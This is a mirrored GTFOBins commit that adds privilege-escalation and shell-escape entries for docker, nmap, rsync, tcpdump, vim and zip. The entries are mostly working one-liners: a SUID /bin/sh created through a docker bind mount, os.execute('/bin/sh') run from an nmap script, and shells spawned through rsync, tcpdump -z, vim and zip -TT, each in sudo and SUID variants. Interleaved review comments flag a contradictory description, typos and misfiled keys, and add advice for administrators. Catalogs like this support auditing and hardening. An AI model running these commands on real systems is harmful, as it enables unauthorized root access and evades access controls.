mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add: docker, nmap, rsync, tcpdump, vim and zip
commit
edd7fec5ff
19
_gtfobins/docker.md
Normal file
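--- a/_gtfobins/docker.md
+++ b/_gtfobins/docker.md
@@ -0,0 +1,19 @@
+---
+description: |
+Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
+
+This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
+functions:
+execute-interactive:
+- code: |
+docker run --rm -v /home/$USER:/h_docs ubuntu \
+sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+sudo-enabled:
+- code: |
+sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
+sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+suid-enabled:
+- code: |
+./docker run --rm -v /home/$USER:/h_docs ubuntu \
+sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+---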
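Review bot: The second paragraph of `description` says the SUID shell is created "in the guest file system", but the three commands write through the `-v /home/$USER:/h_docs` bind mount, so the file lands in the host home directory, as the first paragraph already states. The two paragraphs should agree, for example `This creates a SUID shell in the host home directory through the bind mount.`. The description would also help administrators if it said outright that `docker` group membership is effectively root-equivalent and should be granted and audited on that basis.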
18
_gtfobins/nmap.md
Normal file
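--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -0,0 +1,18 @@
+---
+functions:
+execute-non-interactive:
+- description: Echoing of input characters3ers is disabled.
+code: |
+echo 'os.execute("/bin/sh")' > /tmp/script.nse
+nmap --script=/tmp/script.nse
+sudo-enabled:
+- description: Echoing of input characters3ers is disabled.
+code: |
+echo 'os.execute("/bin/sh")' > /tmp/script.nse
+sudo nmap --script=/tmp/script.nse
+suid-enabled:
+- description: Echoing of input characters3ers is disabled.
+code: |
+echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
+./nmap --script=/tmp/script.nse
+---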
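Review bot: All three `description` values contain the typo "characters3ers", under `execute-non-interactive`, `sudo-enabled` and `suid-enabled`. Each should read `description: Echoing of input characters is disabled.`. Because the same sentence is repeated three times, fixing it in one place and copying it keeps the entries identical.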
9
_gtfobins/rsync.md
Normal file
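--- a/_gtfobins/rsync.md
+++ b/_gtfobins/rsync.md
@@ -0,0 +1,9 @@
+---
+functions:
+execute-interactive:
+- code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+sudo-enabled:
+- code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+suid-enabled:
+- code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+---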
17
_gtfobins/tcpdump.md
Normal file
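--- a/_gtfobins/tcpdump.md
+++ b/_gtfobins/tcpdump.md
@@ -0,0 +1,17 @@
+---
+functions:
+execute-non-interactive:
+- code: |
+COMMAND='id > /tmp/output'
+TF=$(mktemp -u)
+echo "$COMMAND" > $TF
+chmod +x $TF
+tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+suid-enabled:
+- code: |
+COMMAND='id > /tmp/output'
+TF=$(mktemp -u)
+echo "$COMMAND" > $TF
+chmod +x $TF
+sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+---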
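Review bot: The second function is keyed `suid-enabled:` but its command runs `sudo tcpdump ...`, so the entry is filed under the wrong category. The other files in this commit use `sudo-enabled:` for `sudo`-prefixed commands and `./binary` under `suid-enabled:`, so this key should be `sudo-enabled:`. A one-line `description` noting that the behaviour comes from the `-z` post-rotate command option would also tell administrators which argument to disallow in a sudoers rule.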
19
_gtfobins/vim.md
Normal file
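--- a/_gtfobins/vim.md
+++ b/_gtfobins/vim.md
@@ -0,0 +1,19 @@
+---
+functions:
+execute-interactive:
+- code: vim -c ':!/bin/sh'
+- code: |
+vim
+:set shell=/bin/sh
+:shell
+file-write:
+- code: |
+vim file_to_write
+w
+file-read:
+- code: vim file_to_read
+suid-enabled:
+- code: ./vim -c ':!/bin/sh -p'
+sudo-enabled:
+- code: sudo vim -c ':!/bin/sh'
+---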
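Review bot: Under `file-write` the second step is a bare `w`, while the other ex commands in this file carry the leading colon (`:set shell=/bin/sh`, `:shell`). As written the step reads as a normal-mode motion, not a write, so it was presumably meant to be `:w`. As a style point, `suid-enabled` comes before `sudo-enabled` here, the reverse of the order in the docker, nmap and rsync files of this commit.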
15
_gtfobins/zip.md
Normal file
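--- a/_gtfobins/zip.md
+++ b/_gtfobins/zip.md
@@ -0,0 +1,15 @@
+---
+functions:
+execute-interactive:
+- code: |
+zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+rm /tmp/x.zip
+sudo-enabled:
+- code: |
+sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+sudo rm /tmp/x.zip
+suid-limited:
+- code: |
+./zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+sudo rm /tmp/x.zip
+---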
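Review bot: The `suid-limited` block cleans up with `sudo rm /tmp/x.zip`, which assumes sudo rights that the SUID case does not imply. It looks copied from the `sudo-enabled` block above and should probably be plain `rm /tmp/x.zip`, as in `execute-interactive`. The key `suid-limited` also differs from the `suid-enabled` key used by every other file in this commit. If the difference is intentional, a `description` saying what the limitation is would make the entry self-explanatory.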